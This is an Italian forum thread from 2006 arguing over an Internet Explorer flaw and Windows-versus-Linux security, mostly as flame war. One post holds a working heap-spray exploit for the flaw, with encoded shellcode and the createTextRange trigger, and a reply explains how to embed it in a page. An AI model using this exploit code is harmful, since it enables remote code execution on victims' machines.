          A differenza dei Beta Tester (utonti) su Linux la gente e' piu' competente e non si limita a fare 4 clic. Qui si ha accesso ai sorgenti, e' possibile stratestare tutto ... le vulnerabilita' sono normali.Cio' che divverenzia Windows da Linux o altri Open Source e' la rapidita' con la quale puo' essere corretta una vulnerabilita' ... imparagonabile con Windows.Non e' un caso che virus, malware, spyware, falle di vario tipo con diffusione di virus (es. blaster) etc sia aspetto del solo Microsoft.E non mi venite a dire che e' cosi' perche' Linux e' poco utilizzato perche' non e' cosi per 2 motivi fondamentali:1) da quello che vedo nel mio piccolo Linux e' conosciutissimo, e molta gente sta iniziando ad utilizzarlo per stabilita' e sicurezza ineguagliabili (gli stessi utonti se ne rendono conto ... mi meraviglio di voi superesperti winari)2) Virus per Linux ci sono ... ma e' inutile farli ... non farebbero i danni che fanno su Windows o su milioni di PC come spesso succede con conseguente spesa sia per le persone che per lee aziende.Mi spiace che non siate riusciti ad installare Linux anche se l'operazione e' molto semplice (forse perche' atrofizzati da Windows) e a non usarlo in tutte le sue potenzialita' (occorre avere un QI al di sopra del minimo assoluto ... e mi rendo conto che non e' da tutti), ma questo non giustifica le cretinate che andate dicendo su Linux che nemmeno conoscete.saluti.
    • Giambo scrive:
      Re: Valanghe di falle per Linux
      - Scritto da: AnonimoChissa' se conosci la differenza tra una falla sfruttabile da remoto e non patchata con quelle che hai postato ...
      • Anonimo scrive:
        Re: Valanghe di falle per Linux
        - Scritto da: Giambo
        Chissa' se conosci la differenza tra una falla
        sfruttabile da remoto e non patchata con quelle
        che hai postato ...e i linari con le bende sugli occhi...
        • Giambo scrive:
          Re: Valanghe di falle per Linux
          - Scritto da: Anonimo

          Chissa' se conosci la differenza tra una falla

          sfruttabile da remoto e non patchata con quelle

          che hai postato ...

          e i linari con le bende sugli occhi...Ecco, ti sei risposto: Non conosci la differenza :D !Vabbeh, fa' nulla, non e' grave. Studia, studia e poi ripassa.
    • frizzo scrive:
      re:valangeh::browser vs s.o. ???
      CIoè,ora pi ha toccato il fondo.stanno confrontando le falle di un kernel(attualmente è il kernel con + funzionalità,nonchè col maggior riconoscimento hardware)con quelle di UN BROWSER :| :| :| :| :| :| :| ma dico io,scherziamo vero?ragazzi,per favore:non parlate di cose di cui ignorate il significato.==================================Modificato dall'autore il 24/03/2006 17.29.59
  • Anonimo scrive:
    Titolo di PI è forviante!
    Il titolo di PI "confermata nuova falla in IE" è forviante, perchè sembrerebbe riferirsi alla falla DoS di ieri in cui Microsoft diceva che stava indagando. Ma sono 2 falle diverse!
    • Anonimo scrive:
      Re: Titolo di PI è forviante!
      Sarebbe stato fuorviante se avessero titolato "Confermata LA nuova falla di IE" ;-)- Scritto da: Anonimo
      Il titolo di PI "confermata nuova falla in IE" è
      forviante, perchè sembrerebbe riferirsi alla
      falla DoS di ieri in cui Microsoft diceva che
      stava indagando. Ma sono 2 falle diverse!
      • Anonimo scrive:
        Re: Titolo di PI è forviante!
        - Scritto da: Anonimo
        Sarebbe stato fuorviante se avessero titolato
        "Confermata LA nuova falla di IE" ;-)però ci hanno giocato...
  • Anonimo scrive:
    Re: peccato che la versione 7
    - Scritto da: mda
    Visto che il buco interessa anche IE7 ! (leggi
    post precedente)IE7 preview di Marzo NON è affetto. Prima di parlare, informatevi!
  • Anonimo scrive:
    Re: peccato che la versione 7
    - Scritto da: lalla63
    non potrà essere utilizzata su w2kè un colabrodo. Molto meglio XP SP2.
    , ancora molto
    diffuso in utenze professionali.w2k = utenze professionali?wxp = utenze home?Sbagli!
  • Anonimo scrive:
    IE7beta2 di marzo 7.0.5335.5 NON affetto
    IE7beta2 di marzo 7.0.5335.5 NON affetto
    • Anonimo scrive:
      Re: IE7beta2 di marzo 7.0.5335.5 NON aff
      - Scritto da: Anonimo
      IE7beta2 di marzo 7.0.5335.5 NON affettoe secondo te perchè?http://punto-informatico.it/forum/pols.asp?mid=1392025&tid=1392025&p=1&r=PI
    • Anonimo scrive:
      Re: IE7beta2 di marzo 7.0.5335.5 NON aff
      Eh si', lo usano in tanti! :-)- Scritto da: Anonimo
      IE7beta2 di marzo 7.0.5335.5 NON affetto
      • Anonimo scrive:
        Re: IE7beta2 di marzo 7.0.5335.5 NON aff
        - Scritto da: Anonimo
        Eh si', lo usano in tanti! :-)è una preview pubblica; fra l'altro molto stabile e migliore di IE6 SP2.Se lo vuoi scaricare:http://www.microsoft.com/windows/ie/default.mspx
        • Anonimo scrive:
          Re: IE7beta2 di marzo 7.0.5335.5 NON aff
          - Scritto da: Anonimo

          - Scritto da: Anonimo

          Eh si', lo usano in tanti! :-)

          è una preview pubblica; fra l'altro molto stabile
          e migliore di IE6 SP2.
          Se lo vuoi scaricare:
          http://www.microsoft.com/windows/ie/default.mspxNo grazie, uso firefox.
        • Anonimo scrive:
          Re: IE7beta2 di marzo 7.0.5335.5 NON aff
          per me se la possono tenere uso Firefox e Linux! ... e' da 1 anno circa che non vedo piu' Windows se non per fornire assistenza al solito utonto (tra questi addirittura esperti informatici come voi ... che ancora non hanno imparato bene a fare 3 clic)
      • Anonimo scrive:
        Re: IE7beta2 di marzo 7.0.5335.5 NON aff
        - Scritto da: Anonimo
        Eh si', lo usano in tanti! :-)
        Un pò come Linux :p
    • Anonimo scrive:
      9 --
  • Anonimo scrive:
    I troll linari sono scatenati!
    cdorosicate, rosicate...finchè potrete farlo; perchè è in Vista una rivoluzione dell'intero comparto IT, che insabbierà tutti i sistemi operativi linari del pianeta!(win)
    • Anonimo scrive:
      Re: I troll linari sono scatenati!
      - Scritto da: Anonimo
      cdo

      rosicate, rosicate...finchè potrete farlo; perchè
      è in Vista una rivoluzione dell'intero comparto
      IT, che insabbierà tutti i sistemi operativi
      linari del pianeta!

      (win)tu manco sai cos'è it(c64)(amiga)(apple)(linux)
    • Anonimo scrive:
      Re: I troll linari sono scatenati!
      - Scritto da: Anonimo
      cdo

      rosicate, rosicate...finchè potrete farlo; perchè
      è in Vista una rivoluzione dell'intero comparto
      IT, che insabbierà tutti i sistemi operativi
      linari del pianeta!

      (win)si ho una paura ma cos'ì tantahttp://www.smarthouse.com.au/Computing/Platforms?Article=/Computing/Platforms/R7G5G6U4che puoi verificare su questo link sopra.Ovvero devono riscrivere il 60% del sistema operativo :DOh si una rivoluzione!!!La storia non è cambiata.. Bug a go go
      • Trollfighter scrive:
        Re: I troll linari sono scatenati!
        - Scritto da: Anonimo
        Oh si una rivoluzione!!!
        La storia non è cambiata.. Bug a go goEh ci saranno i bug, ma qualcuno ha il coraggio di reinventare, rinnovare e proporre, voi linari siete sempre li in cantina sotto tre dita di muffa col vostro catorcio di commodore 64 a manovella che giocate a omega race.Mwahahahah!
        • Anonimo scrive:
          Re: I troll linari sono scatenati!

          Eh ci saranno i bug, ma qualcuno ha il coraggio
          di reinventare, rinnovare e proporre, voi linari
          siete sempre li in cantina sotto tre dita di
          muffa col vostro catorcio di commodore 64 a
          manovella che giocate a omega race.
          Mwahahahah!Fa ridere come dobbiate offendere per riuscire a dimostrare quanto sia migliore quel prodotto inventando storielle da troll :)
          • Anonimo scrive:
            Re: I troll linari sono scatenati!
            - Scritto da: Anonimo


            Eh ci saranno i bug, ma qualcuno ha il coraggio

            di reinventare, rinnovare e proporre, voi linari

            siete sempre li in cantina sotto tre dita di

            muffa col vostro catorcio di commodore 64 a

            manovella che giocate a omega race.

            Mwahahahah!

            Fa ridere come dobbiate offendere per riuscire a
            dimostrare quanto sia migliore quel prodotto
            inventando storielle da troll :)Non abbiamo nulla da dimostrare, è il 90% del mercato lo dimostra.Invece voihttp://punto-informatico.it/forum/pol.asp?mid=1392627&tid=1392627&p=1&r=PIpiù che dimostrare dovete risolvere...o sarà mica che l'opensorciaro medio scarica scarica installa usa e non contribuisce mai? eh?Buon patchaggio e ricompilazione.Grazie.
          • Anonimo scrive:
            Re: I troll linari sono scatenati!

            Non abbiamo nulla da dimostrare, è il 90% del
            mercato lo dimostra.
            qui sbagli.1) c'e' molta ignoranza in giro e molto spesso gli utonti nemmeno sanno dell'esistenza di piu' valide alternative (fino a quando non gli si apre gli occhi).Se in un PC che acquisto sono obbligato ad avere anche Windows ... questo e' mercato scorretto.Quello che dici e' quindi sbagliato!2) lato server, dove chi ci lavora ne sa un po' di piu' (non in Italia) ... Linux/Unix stravincono!!!3) le varie statistiche di mercato non hanno valore per Linux ... per quello non c'e' mercato (escluse RedHat e Suse)... che rappresentano solo una piccola porzione degli utilizzatori. Io ad es.ho 2 PC con Linux ... ma per quei 2 PC ho dovuto pagare la licenza Microsoft ... anche se non la volevo (i prossimi acquisti daro' battaglia)
          • Giambo scrive:
            Re: I troll linari sono scatenati!
            - Scritto da: Anonimo

            Fa ridere come dobbiate offendere per riuscire a

            dimostrare quanto sia migliore quel prodotto

            inventando storielle da troll :)

            Non abbiamo nulla da dimostrare, è il 90% del
            mercato lo dimostra.Come dire: Il 100% dei tesserati del partito comunista Nord Coreano dimostrano che ...Come in Corea, il mercato non e' "libero" bensi' viziato dalla politica di Microsoft (Gia' condannata in USA e in gravi difficolta' in EU e altri paese del mondo).
            Buon patchaggio e ricompilazione.Grazie, e' bello sapere di avere patches a disposizione, oltre che il codice sorgente :) !
        • Anonimo scrive:
          Re: I troll linari sono scatenati!
          - Scritto da: Trollfighter

          - Scritto da: Anonimo


          Oh si una rivoluzione!!!

          La storia non è cambiata.. Bug a go go

          Eh ci saranno i bug, ma qualcuno ha il coraggio
          di reinventare, rinnovare e proporre, voi linariBWHAHAHA, un'altro cabarettista! Dai che forse con vista non ci sara' piu' bisogno del defrag, con winfs... errSo che sei un troll, ma potevi essere piu' creativo, microsoft non ha mai innovato niente, e' sempre arrivata dove il mercato era gia' maturo, ha comprato un prodotto e l'ha rivenduto come proprio: excel, powerpoint, ms bob, ah no, quest'ultimo non l'ha comprato, l'ha creato in casa... (-;
          siete sempre li in cantina sotto tre dita di
          muffa col vostro catorcio di commodore 64 a
          manovella che giocate a omega race.
          Mwahahahah!Retrocoputing rulez!Il mio C64 ce l'ho ancora, ma non si accende piu' (boot mi pare una parola grossa), l'ultima volta si era bruciato il chip video (VIC)...
          • Anonimo scrive:
            Re: I troll linari sono scatenati!
            - Scritto da: Anonimo


            Retrocoputing rulez!
            Stupid typo: Retrocomputing rulez!
          • Anonimo scrive:
            Re: I troll linari sono scatenati!

            So che sei un troll, ma potevi essere piu'
            creativo, microsoft non ha mai innovato niente,Scusa, linux cosa avrebbe inventato??
          • Giambo scrive:
            Re: I troll linari sono scatenati!
            - Scritto da: Anonimo

            So che sei un troll, ma potevi essere piu'

            creativo, microsoft non ha mai innovato niente,

            Scusa, linux cosa avrebbe inventato??Ha reso concreto un modo, una mentalita' di sviluppo software.Se inveci parli di innovazioni dal punto di vista tecnologico, IMHO sono anni che non si vede nulla di "vero".
          • Anonimo scrive:
            Re: I troll linari sono scatenati!
            - Scritto da: Giambo

            - Scritto da: Anonimo



            So che sei un troll, ma potevi essere piu'


            creativo, microsoft non ha mai innovato
            niente,



            Scusa, linux cosa avrebbe inventato??

            Ha reso concreto un modo, una mentalita' di
            sviluppo software.
            Se inveci parli di innovazioni dal punto di vista
            tecnologico, IMHO sono anni che non si vede nulla
            di "vero".
            Ah ecco.
          • Anonimo scrive:
            9 --
          • Anonimo scrive:
            Re: I troll linari sono scatenati!

            Retrocoputing rulez!

            Il mio C64 ce l'ho ancora, ma non si accende piu'
            (boot mi pare una parola grossa), l'ultima volta
            si era bruciato il chip video (VIC)...certo, certo, ma non confondiamo l'oro (c64) con la cacca (linux).
    • Giambo scrive:
      Re: I troll linari sono scatenati!
      - Scritto da: Anonimo
      rosicate, rosicate...finchè potrete farlo; perchè
      è in Vista una rivoluzione dell'intero comparto
      IT, che insabbierà tutti i sistemi operativi
      linari del pianeta!- Windows 95 insabbierà tutti i sistemi operativi ...- Windows 98 insabbierà tutti i sistemi operativi ...- Windows ME insabbierà tutti i sistemi operativi ...- Windows 2K insabbierà tutti i sistemi operativi ...- Windows XP insabbierà tutti i sistemi operativi ...- Windows Vista insabbierà tutti i sistemi operativi ...Developers, developers, developers !!YAAAWWWNNN :-o !!!
      • robadamatti scrive:
        Re: I troll linari sono scatenati!
        Non e' questione di maturita' o meno.E' questione di mercato ... e di monopoli.Un utonto che acquista un PC con Windows preinstallato ... non sapra' mai che esistono validissime alternative.Microsoft puo' farsi pubblicita' e lo fa ... Linux avanza comunque.Le statistiche dello 0.3% sono inoltre false. Non e' possibile stabilire la diffusione di Linux ... non esiste mercato per quello nel senso che non lo acquisti (redhat e suse escluse) ... ma scarichi una distribuzione e la installi senza dire niente a nessuno ... e nessuno lo sa'.Da quello che posso vedere io (lavoro con laureati, ingegneri e professionisti) ... lo 0.3% si vede con Windows.Ma a differenza degli utonti noi conosciamo e possiamo sfuggire alle regole del mercato. Un utonto e' obbligato ad acquistare Windows ... alla faccia di un libero mercato che non c'e' e ad una liberta' di scelta che non c'e'.Lo sai a cosa si va incontro se acquisti un portatile e non vuoi pagare Windows?Immagino di no ... e non e' questione di volere tutto gratis ... e' questione di volere un prodotto valido.Ma queste cose e difficile spiegarle ad uno che non conosce la materia.Io (con tutto il rispetto) fossi in te tornerei a giocare e a stare zitto.Saluti.
      • Giambo scrive:
        Re: I troll linari sono scatenati!
        - Scritto da: Anonimo
        Così parlò un linaro.Certo che voi Windowsauri avete una fantasia ... Solo copiare gli altri sapete fare, eh :) ?
        • Anonimo scrive:
          Re: I troll linari sono scatenati!
          - Scritto da: Giambo

          - Scritto da: Anonimo


          Così parlò un linaro.

          Certo che voi Windowsauri avete una fantasia ...
          Solo copiare gli altri sapete fare, eh :) ?Perche' linux cosa ha portato di nuovo?
          • Giambo scrive:
            Re: I troll linari sono scatenati!
            - Scritto da: Anonimo

            Certo che voi Windowsauri avete una fantasia ...

            Solo copiare gli altri sapete fare, eh :) ?

            Perche' linux cosa ha portato di nuovo?Linux e' l'incarnazione di un certo modo di creare e condividere software.Vuoi parlare di cosa ha portato Windows ?
          • Anonimo scrive:
            Re: I troll linari sono scatenati!
            Vermi?
          • Anonimo scrive:
            Re: I troll linari sono scatenati!
            - Scritto da: Anonimo
            Vermi?No, quelli c'erano già su Unix.Semmai ha portato zombie.
          • Anonimo scrive:
            Re: I troll linari sono scatenati!

            No, quelli c'erano già su Unix.
            Semmai ha portato zombie.Si anche su BSD, ovvero da dove windows s'è copiata lo stack del TCPIP eh..
    • pikappa scrive:
      Re: I troll linari sono scatenati!
      - Scritto da: Anonimo
      cdo

      rosicate, rosicate...finchè potrete farlo; perchè
      è in Vista una rivoluzione dell'intero comparto
      IT, che insabbierà tutti i sistemi operativi
      linari del pianeta!

      (win)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)Ti Vogliamo a Zelig in TV!!!!
  • Anonimo scrive:
    Re: peccato che la versione 7
    - Scritto da: Anonimo

    Ma che ca****e dici ?????proprio quello che mi stavo domandando io, leggendo il mio quote! :D
  • Anonimo scrive:
    :DDDDDDDDDDDDDDDDD
    L'articolo si commenta da se..HAHAHAHAHAHAHAHHAHHHAHAche Circo Togni che sono!
  • Anonimo scrive:
    Codice per verificare la falla
    shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +"%uCC4A%uD0FF"); bigblock = unescape("%u9090%u9090"); slackspace = 20 + shellcode.length while (bigblock.length < slackspace) bigblock += bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length + slackspace < 0x40000) block = block + block + fillblock; memory = new Array(); for ( i = 0; i < 2020; i++ ) memory[i] = block + shellcode; var r = document.getElementById('blah').createTextRange();
    • Anonimo scrive:
      Re: Codice per verificare la falla
      Ovviamente il codice deve stare tra due tag script, e all'inizio deve esserci una checkbox:input type="checkbox" id="blah"
  • Anonimo scrive:
    Re: peccato che la versione 7
    - Scritto da: lalla63[cut]
    Questo con explorer, ed in genere con i prodotti
    sviluppati da società commerciali di software,
    tende a non succedere.Proprio Microsoft non ha garantito la compatibilità tra versioni successive dei propri programmi: slides fatte con power point 2k che con XP si perdevano i link, impaginazioni da rifare da word 97 a XP eccetera eccetera....Per non parlare dei "database" di access....
    • Anonimo scrive:
      Re: peccato che la versione 7
      ma microsoft è microsoft, e certe cose la gente le "lascia passare"...se però è un altro sw no eh, vietato!
  • Anonimo scrive:
    Linux forever!!!
    Altro che le cacate microsoft.
    • Anonimo scrive:
      valanga di falle per linux
      quante vulnerabilità ci sono state per linux questo mese?Linux Kernel SDLA IOCTL Unauthorized Local Firmware Access Vulnerability2006-03-24http://www.securityfocus.com/bid/16304 Linux Kernel DM-Crypt Local Information Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16301 Linux Kernel Sysctl_String Local Buffer Overflow Vulnerability2006-03-24http://www.securityfocus.com/bid/16141 Linux Kernel ProcFS Kernel Memory Disclosure Vulnerability2006-03-24http://www.securityfocus.com/bid/16284 Linux Kernel IP6_Input_Finish Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16043 Linux Kernel Time_Out_Leases PrintK Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15627 Linux Kernel ICMP_Push_Reply Remote Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16044 Linux Kernel handle_stop_signal Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16856 Linux Kernel IPv6 FlowLable Denial Of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15729 Linux Kernel PTraced Child Auto-Reap Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15625 Linux Kernel PTrace CLONE_THREAD Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/15642 Linux Kernel SET_MEMPOLICY Local Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16135 Linux Kernel mq_open System Call Unspecified Denial of Service Vulnerability2006-03-24http://www.securityfocus.com/bid/16283 Linux Kernel Console Keymap Local Command Injection Vulnerability2006-03-24http://www.securityfocus.com/bid/15122 Linux Kernel Multiple Memory Leak Local Denial Of Service Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15076 Linux Orinoco Driver Remote Information Disclosure Vulnerability2006-03-23http://www.securityfocus.com/bid/15085 Linux Kernel USB Subsystem Local Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14955 Linux Kernel Multiple Security Vulnerabilities2006-03-23http://www.securityfocus.com/bid/15049 Linux Kernel 64-Bit SMP Routing_ioctl() Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14902 Linux Kernel IPV6 Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15156 Linux Kernel SCSI ProcFS Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14790 Linux Kernel Sysctl Unregistration Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/15365 Linux Kernel IPSec Policies Authorization Bypass Vulnerability2006-03-23http://www.securityfocus.com/bid/14609 Linux Kernel ISO File System Denial Of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/14614 Linux Kernel Sendmsg() Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14785 Linux Kernel Multiple Vulnerabilities2006-03-23http://www.securityfocus.com/bid/12598 Linux Kernel Coda_Pioctl Local Buffer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/14967 Linux Kernel USB io_edgeport Driver Local Integer Overflow Vulnerability2006-03-23http://www.securityfocus.com/bid/12102 Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities2006-03-23http://www.securityfocus.com/bid/17203 Linux Kernel die_if_kernel Local Denial of Service Vulnerability2006-03-23http://www.securityfocus.com/bid/16993 ecc. ecc.
      • Anonimo scrive:
        Re: valanga di falle per linux
        NON E' VERO, sono informazioni false. LINUX SEMPRE FOREVER!- Scritto da: Anonimo

        quante vulnerabilità ci sono state per linux
        questo mese?

        Linux Kernel SDLA IOCTL Unauthorized Local
        Firmware Access Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16304

        Linux Kernel DM-Crypt Local Information
        Disclosure Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16301

        Linux Kernel Sysctl_String Local Buffer Overflow
        Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16141

        Linux Kernel ProcFS Kernel Memory Disclosure
        Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16284

        Linux Kernel IP6_Input_Finish Remote Denial Of
        Service Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16043

        Linux Kernel Time_Out_Leases PrintK Local Denial
        of Service Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/15627

        Linux Kernel ICMP_Push_Reply Remote Denial Of
        Service Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16044

        Linux Kernel handle_stop_signal Denial of Service
        Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16856

        Linux Kernel IPv6 FlowLable Denial Of Service
        Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/15729

        Linux Kernel PTraced Child Auto-Reap Local Denial
        of Service Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/15625

        Linux Kernel PTrace CLONE_THREAD Local Denial of
        Service Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/15642

        Linux Kernel SET_MEMPOLICY Local Denial of
        Service Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16135

        Linux Kernel mq_open System Call Unspecified
        Denial of Service Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/16283

        Linux Kernel Console Keymap Local Command
        Injection Vulnerability
        2006-03-24
        http://www.securityfocus.com/bid/15122

        Linux Kernel Multiple Memory Leak Local Denial Of
        Service Vulnerabilities
        2006-03-23
        http://www.securityfocus.com/bid/15076

        Linux Orinoco Driver Remote Information
        Disclosure Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/15085

        Linux Kernel USB Subsystem Local Denial Of
        Service Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/14955

        Linux Kernel Multiple Security Vulnerabilities
        2006-03-23
        http://www.securityfocus.com/bid/15049

        Linux Kernel 64-Bit SMP Routing_ioctl() Local
        Denial of Service Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/14902

        Linux Kernel IPV6 Local Denial of Service
        Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/15156

        Linux Kernel SCSI ProcFS Denial Of Service
        Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/14790

        Linux Kernel Sysctl Unregistration Local Denial
        of Service Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/15365

        Linux Kernel IPSec Policies Authorization Bypass
        Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/14609

        Linux Kernel ISO File System Denial Of Service
        Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/14614

        Linux Kernel Sendmsg() Local Buffer Overflow
        Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/14785

        Linux Kernel Multiple Vulnerabilities
        2006-03-23
        http://www.securityfocus.com/bid/12598

        Linux Kernel Coda_Pioctl Local Buffer Overflow
        Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/14967

        Linux Kernel USB io_edgeport Driver Local Integer
        Overflow Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/12102

        Linux Kernel Ssockaddr_In.Sin_Zero Kernel Memory
        Disclosure Vulnerabilities
        2006-03-23
        http://www.securityfocus.com/bid/17203

        Linux Kernel die_if_kernel Local Denial of
        Service Vulnerability
        2006-03-23
        http://www.securityfocus.com/bid/16993

        ecc. ecc.
      • Anonimo scrive:
        Re: valanga di falle per linux
        - Scritto da: Anonimo

        quante vulnerabilità ci sono state per linux
        questo mese?Impara prima a leggere, buffone!
      • Anonimo scrive:
        Re: valanga di falle per linux
        come ti ho gia' scritto da qualche altra parte l'elenco che riporti ... ti fa perdere di credibilita'. Hai detto scemenze e quello che dici conferma la bonta' di Linux ...Mah... quanta ignoranza
      • Anonimo scrive:
        Re: valanga di falle per linux
        e' un bene che ci siano. Questo significa che se sono state trovate:1) molta gente lo usa2) sono state immediatamente correte e quindi non ci sono piu' ... maggior sicurezza3) OS migliore di CSAncora non te ne sei reso conto e fai figurine di merda? ... potresti comprare anche l'album per attaccarcele e ricordartele.
  • Anonimo scrive:
    VAUTA I FATTI !!!!!
    Grazie PI per ricordare sempre a chi si collega,tramite un'apposito banner, che occorre VALUTAREI FATTI, riguardo alla fuffa di quell'azienda markettaradella microsfottoVALUTA I FATTI !!!!Enormi somme di denaro buttate via in presuntasicurezza, che non serve assolutamente a nulla inquanto un giorno si e uno no escono exploit cheverranno patchati dopo intere settimane !!Pazzesco. E pazzi sono quelli che usano questeschifezze, per incompetenza patentata
    • Anonimo scrive:
      Re: VAUTA I FATTI !!!!!

      Io ripeto sempre che un software sicuro non e' un
      software che non ha falle, ma un software
      supportato da persone o aziende o comunita' che
      correggano le falle nel + breve tempo possibile.
      Piu' e' minore questo tempo + un software puo'
      considerarsi sicuro.
      Voi cosa ne pensate ?che hai assolutamente ragione, un sw completamente senza bug è quasi impossibile da immaginare, ma se viene fixato appena scoperto il bug (ah, che non sia dopo anni :D) beh, in quel caso mi sembra "ok" :|
    • Anonimo scrive:
      Re: VAUTA I FATTI !!!!!
      Forse Microsoft capirà che si deve dedicare a quelle cagate della Xbox e al Media center e lasciare il lavoro serio a Linux.
      • Anonimo scrive:
        ROTFL
        - Scritto da: Anonimo
        lasciare il lavoro serio a Linux.Linuc$ è tutto meno che serio :p
      • Trollfighter scrive:
        Re: VAUTA I FATTI !!!!!
        - Scritto da: Anonimo
        Forse Microsoft capirà che si deve dedicare a
        quelle cagate della Xbox e al Media center e
        lasciare il lavoro serio a Linux.Linux non è un'azienda,Linux non produce hardware,Linux non produce innovazione,Linux non è afflitto dai problemi di Windows perchè non hai mai avuto il coraggio di proporsi come seria alternativa al prodotto commerciale,Linux vive di riflesso, alle spalle di M$ e dei produttori di hardware,Linux è tutto questo è tanto altro, ma di sicuro non è una cosa seria.Mwahahahahaha!
        • Anonimo scrive:
          Re: VAUTA I FATTI !!!!!
          - Scritto da: Trollfighter

          Forse Microsoft capirà che si deve dedicare a

          quelle cagate della Xbox e al Media center e

          lasciare il lavoro serio a Linux.

          Linux non è un'azienda,ma la RedHat si (giusto per citarne una), così come tutte le aziende che forniscono consulenza... perché OK che Linux è meglio, ma se non lo sai configurare a modo può lasciare aperte porte più grosse dei bug di UinDOS
          Linux non produce hardware,neanche MS in senso stretto
          Linux non produce innovazione,beh... qui avrei qualcosa da ridire...
          Linux non è afflitto dai problemi di Windows
          perchè non hai mai avuto il coraggio di proporsi
          come seria alternativa al prodotto commerciale,Linux non è un prodotto commerciale, e non può proporsi come tale.
          Linux vive di riflesso, alle spalle di M$ e dei
          produttori di hardware,seee... non esageriamo... Linux vivrebbe benissimo anche se non esistesse MS, anche se bisogna riconoscere che a livello di GUI Linux ha molto copiato tanto da Win quanto da Mac, e purtroppo molto sw per Linux non esiste (non è un caso l'utilizzo di wine)
          Linux è tutto questo è tanto altro, ma di sicuro
          non è una cosa seria.Sarebbe bello se ci spieghi la tua concezione di serietàciaoPS: non so né pro né contro Linux... mi piace sapere che esistono alternative
          • Anonimo scrive:
            Re: VAUTA I FATTI !!!!!
            - Scritto da: Anonimo
            bisogna riconoscere che a livello di GUI Linux ha
            molto copiato tanto da Win quanto da Mac, eforse il contrario :) si vede che non conosci la storia e che non segui il progetto GNU da molto tempo
            purtroppo molto sw per Linux non esiste (non è un
            caso l'utilizzo di wine)AHHHHHHHH... FALSITA' E MENZOGNA!!!!per quanto riguarda me, io uso solo ciò che è open source.. perché il software deve essere open source... alternative per me non esistono.. Sia ben chiaro, parlo per me.
          • Anonimo scrive:
            Re: VAUTA I FATTI !!!!!
            - Scritto da: Anonimo

            bisogna riconoscere che a livello di GUI Linux ha

            molto copiato tanto da Win quanto da Mac, e

            forse il contrario :) ma proprio per niente... il solo fatto che su Linux la GUI è arrivata "dopo", e che scimmiotta palesemente la GUI di Windows, con tanto di barra inveriore e simil-menù-start, è un esempio più che lampante.
            si vede che non conosci la storiasi si... mo la studio...

            purtroppo molto sw per Linux non esiste (non è

            un caso l'utilizzo di wine)
            AHHHHHHHH... FALSITA' E MENZOGNA!!!!

            per quanto riguarda me, io uso solo ciò che è
            open source.. perché il software deve essere open
            source... alternative per me non esistono.. Sia
